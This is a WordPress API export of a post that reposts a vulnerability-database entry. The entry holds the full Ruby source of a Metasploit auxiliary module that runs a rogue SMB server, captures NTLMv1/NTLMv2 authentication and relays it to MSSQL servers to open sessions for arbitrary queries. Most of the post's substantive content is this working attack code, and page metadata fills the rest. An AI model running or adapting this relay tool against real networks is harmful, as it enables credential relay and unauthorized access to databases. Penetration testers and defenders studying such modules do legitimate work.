{"id":27432,"date":"2025-11-24T13:46:24","date_gmt":"2025-11-24T13:46:24","guid":{"rendered":"http:\/\/localhost\/?p=27432"},"modified":"2025-11-24T13:46:24","modified_gmt":"2025-11-24T13:46:24","slug":"microsoft-windows-smb-to-mssql-relay","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27432","title":{"rendered":"Microsoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL-"},"content":{"rendered":"

{“lastseen”:”2025-11-24T19:04:38″,”description”:”This module supports running an SMB server which validates credentials, and then attempts to execute a relay attack against an MSSQL server on the configured RHOSTS hosts. If the relay succeeds, an MSSQL session to the target will be created. This can…”,”published”:”2025-11-24T18:58:10″,”modified”:”2025-11-24T18:58:10″,”type”:”metasploit”,”title”:”Microsoft Windows SMB to MSSQL Relay”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::SMB::RelayServer\\n include Msf::Auxiliary::CommandShell\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Microsoft Windows SMB to MSSQL Relay’,\\n ‘Description’ =\\u003e %q{\\n This module supports running an SMB server which validates credentials, and then attempts to execute a relay\\n attack against an MSSQL server on the configured RHOSTS hosts.\\n\\n If the relay succeeds, an MSSQL session to the target will be created. This can be used by any modules that\\n support MSSQL sessions, like `admin\/mssql\/mssql_enum`. The session can also be used to run arbitrary queries.\\n\\n Supports SMBv2, SMBv3, and captures NTLMv1 as well as NTLMv2 hashes.\\n SMBv1 is not supported – please see https:\/\/github.com\/rapid7\/metasploit-framework\/issues\/16261\\n },\\n ‘Author’ =\\u003e [\\n ‘Spencer McIntyre’\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Actions’ =\\u003e [\\n [ ‘CREATE_MSSQL_SESSION’, { ‘Description’ =\\u003e ‘Create an MSSQL session’ } ]\\n ],\\n ‘PassiveActions’ =\\u003e [ ‘CREATE_MSSQL_SESSION’ ],\\n ‘DefaultAction’ =\\u003e ‘CREATE_MSSQL_SESSION’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [ CRASH_SAFE ],\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION ],\\n ‘SideEffects’ =\\u003e [ IOC_IN_LOGS, ACCOUNT_LOCKOUTS ]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n Opt::RPORT(1433)\\n ]\\n )\\n\\n register_advanced_options(\\n [\\n OptBool.new(‘RANDOMIZE_TARGETS’, [true, ‘Whether the relay targets should be randomized’, true])\\n ]\\n )\\n end\\n\\n def relay_targets\\n Msf::Exploit::Remote::SMB::Relay::TargetList.new(\\n :mssql,\\n datastore[‘RPORT’],\\n datastore[‘RHOSTS’],\\n datastore[‘TARGETURI’],\\n randomize_targets: datastore[‘RANDOMIZE_TARGETS’]\\n )\\n end\\n\\n def check_options\\n unless framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)\\n fail_with(Failure::BadConfig, ‘This module requires the `mssql_session_type` feature to be enabled. Please enable this feature using `features set mssql_session_type true`’)\\n end\\n end\\n\\n def run\\n check_options\\n\\n start_service\\n print_status(‘Server started.’)\\n\\n # Wait on the service to stop\\n service.wait if service\\n end\\n\\n def on_relay_success(relay_connection:, relay_identity:)\\n print_good(‘Relay succeeded’)\\n session_setup(relay_connection, relay_identity)\\n rescue StandardError =\\u003e e\\n elog(‘Failed to setup the session’, error: e)\\n end\\n\\n # @param [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::MSSQL::Client] relay_connection\\n # @return [Msf::Sessions::MSSQL]\\n def session_setup(relay_connection, relay_identity)\\n mssql_session = Msf::Sessions::MSSQL.new(\\n relay_connection.sock,\\n {\\n client: relay_connection,\\n **relay_connection.detect_platform_and_arch\\n }\\n )\\n domain, _, username = relay_identity.partition(‘\\\\\\\\’)\\n datastore_options = {\\n ‘DOMAIN’ =\\u003e domain,\\n ‘USERNAME’ =\\u003e username\\n }\\n start_session(self, nil, datastore_options, false, mssql_session.rstream, mssql_session)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/server\/relay\/smb_to_mssql.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/server\/relay\/smb_to_mssql\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-11-24T19:04:38″,”description”:”This module supports running an SMB server which validates credentials, and then attempts to execute a relay attack against an MSSQL server on the configured…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-27432","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nMicrosoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27432\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Microsoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-11-24T19:04:38″,”description”:”This module supports running an SMB server which validates credentials, and then attempts to execute a relay attack against an MSSQL server on the configured...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27432\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-24T13:46:24+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27432#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27432\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Microsoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL-\",\"datePublished\":\"2025-11-24T13:46:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27432\"},\"wordCount\":682,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27432#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27432\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27432\",\"name\":\"Microsoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-24T13:46:24+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27432#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27432\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27432#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Microsoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Microsoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27432","og_locale":"en_US","og_type":"article","og_title":"Microsoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL- zero redgem","og_description":"{“lastseen”:”2025-11-24T19:04:38″,”description”:”This module supports running an SMB server which validates credentials, and then attempts to execute a relay attack against an MSSQL server on the configured...","og_url":"https:\/\/zero.redgem.net\/?p=27432","og_site_name":"zero redgem","article_published_time":"2025-11-24T13:46:24+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27432#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27432"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Microsoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL-","datePublished":"2025-11-24T13:46:24+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27432"},"wordCount":682,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27432#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27432","url":"https:\/\/zero.redgem.net\/?p=27432","name":"Microsoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-24T13:46:24+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27432#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27432"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27432#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Microsoft Windows SMB to MSSQL Relay_MSF:AUXILIARY-SERVER-RELAY-SMB_TO_MSSQL-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27432","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27432"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27432\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27432"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27432"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27432"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}